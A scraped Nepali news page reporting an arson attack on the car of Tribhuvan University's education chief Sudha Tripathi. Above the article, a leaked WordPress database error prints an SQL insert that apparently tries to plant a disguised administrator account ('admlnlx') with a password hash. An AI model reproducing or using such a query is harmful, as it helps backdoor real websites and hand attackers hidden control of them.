WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHN4FU/IXIcBZN5fZrQ31ZrY0pqv1x/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 11:24:39', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
त्रिविका शिक्षाध्यक्ष त्रिपाठीको गाडीमा आगजनी – Gaule Khabar

त्रिविका शिक्षाध्यक्ष त्रिपाठीको गाडीमा आगजनी

त्रिविका शिक्षाध्यक्ष त्रिपाठीको गाडीमा आगजनी

काठमाडौ,फागुन २-

त्रिभुवन विश्वविद्यालयका शिक्षाध्यक्ष सुधा त्रिपाठीको गाडीमा अज्ञात समूहले आगजनी गरेको छ।  त्रिपाठी स्वयम् चढेको बा २ च ५६५० नम्बरको गाडीमा सोमबार बिहान यूएन पार्क नजिकै आगजनी भएको जिल्ला प्रहरी कार्यालय ललितपुरले पुष्टि गर्‍यो। आगो स्थानीयको सहयोगमा नियन्त्रणमा लिइएको प्रहरीले जनाएको छ। आगजनी कसले र किन गर्‍यो भन्ने खुल्न सकेको छैन। संलग्नहरुको खोजी कार्य जारी रहेको प्रहरीले जनाएको छ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका